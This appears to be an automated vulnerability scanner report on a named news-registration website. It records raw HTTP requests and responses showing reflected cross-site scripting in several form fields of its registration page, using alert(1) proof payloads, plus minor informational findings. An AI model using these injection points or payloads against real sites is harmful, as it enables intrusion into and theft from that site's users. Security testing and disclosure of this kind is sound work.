HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:31 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '-'ab223<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:30 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Phone_a" value= "'-'900b8"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:36 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '-'-'c4284<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:35 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Phone_a" value= "'-'-'75a34"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:40 GMT Content-Length: 6647 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '-'-' ext. 3d2c2<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:39 GMT Content-Length: 6651 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Phone_a" value= "'-'-' ext. 3b711"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:15 GMT Content-Length: 6637 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Postal_a" value= "''e0ea5"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:17 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ''e1e75<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:20 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: '' ''e548c<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:19 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Postal_a" value= "'' ''c7c9c"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:26 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: 73c83<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:25 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="StationPhone_a" value= "8a939"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:28 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="StationPhone_a" value= "-d3bfa"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:30 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: -d85a0<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:34 GMT Content-Length: 6635 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: --62ca4<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:33 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="StationPhone_a" value= "--9b023"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:15 GMT Content-Length: 6639 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... <input type="hidden" name="Title" value= "8c478"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:13:16 GMT Content-Length: 6631 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... </b>: ae6d2<script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.bnhotwire.com |
Path: | /register/ |
GET /register/ HTTP/1.1 Accept: */* Referer: http://www.thecanadi Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:11:11 GMT Content-Length: 13143 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQATAARC Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT LANGUAGE="JavaScript"> var isNN = (navigator.appName ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /content.asp |
GET /content.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Cookie: ASPSESSIONIDQQATAARC |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:31 GMT Content-Length: 1559 Content-Type: text/html Cache-control: private <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Command News</title> <link rel="stylesheet" href="cpstyle.css"> <script language="Javascript"> < ...[SNIP]... <a class="newBody" href="mailto:HotWire@thecanadianpress HotWire@thecanadianpress ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/confirm.asp |
POST /register/confirm.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 245 check_1=ON&B1=Submit ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:12:49 GMT Content-Length: 3733 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <script language="JavaScript"> <!-- //CloseWindow function closeWindow() { ...[SNIP]... <a href="mailto:hotwirehelp@thecanad hotwirehelp@thecanad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | / |
GET / HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.bnhotwire.com Cookie: ASPSESSIONIDQQATAARC |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://www.bnhotwire.com Date: Tue, 14 Dec 2010 16:14:31 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Fri, 14 Nov 2003 21:35:53 GMT ETag: "f0c78a47f7aac31:14f2" Content-Length: 683 <html> <head> <title>Welcome to BN Hotwire!</title> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor </head> <frameset rows= ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/ |
GET /register/ HTTP/1.1 Accept: */* Referer: http://www.thecanadi Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:11:11 GMT Content-Length: 13143 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQATAARC Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT LANGUAGE="JavaScript"> var isNN = (navigator.appName ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/confirm.asp |
POST /register/confirm.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 245 check_1=ON&B1=Submit ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:12:49 GMT Content-Length: 3733 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <script language="JavaScript"> <!-- //CloseWindow function closeWindow() { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /register/terms.asp |
POST /register/terms.asp HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: ASPSESSIONIDQQATAARC Content-Length: 303 FirstName=%27%27&LastName ...[SNIP]... |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:12:42 GMT Content-Length: 6553 Content-Type: text/html Cache-control: private <html> <head> <title>HotWire Registration</title> <link rel="stylesheet" type="text/css" href="../cpstyle.css"> <SCRIPT language=javascript> <!-- //CloseWindow function closeWindow() { p ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bnhotwire.com |
Path: | /start.htm |
GET /start.htm HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms Referer: http://www.bnhotwire.com/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: www.bnhotwire.com Proxy-Connection: Keep-Alive Cookie: ASPSESSIONIDQQATAARC |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 14 Dec 2010 16:14:32 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 17 Sep 2008 15:42:52 GMT ETag: "2a5dd0bdc18c91:14f2" Content-Length: 323 <HTML> <HEAD> <TITLE>Development Server</TITLE> <META HTTP-EQUIV="Refresh" content="0; URL=http://www.bnhotwire </HEAD> <BODY> <P>Loading... Press <A HREF=http:/ ...[SNIP]... |